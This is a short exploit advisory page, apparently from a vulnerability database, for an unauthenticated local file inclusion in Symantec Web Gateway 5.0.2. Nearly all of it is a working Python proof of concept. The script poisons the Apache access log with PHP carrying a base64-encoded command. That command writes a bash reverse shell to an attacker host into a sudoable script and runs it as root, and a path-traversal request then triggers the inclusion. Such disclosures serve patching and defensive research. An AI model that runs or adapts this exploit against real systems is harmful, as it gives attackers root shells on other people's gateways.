Symantec Web Gateway 5.0.2 Local File Inclusion

2012.05.28
Credit: muts
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

#!/usr/bin/python # Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept # Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. # muts at offensive-security dot com import socket import base64 payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript''' payloadencoded=base64.encodestring(payload).replace("\n","") taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("172.16.164.129", 80)) expl.send(taint) expl.close() trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("172.16.164.129", 80)) expl.send(trigger) expl.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top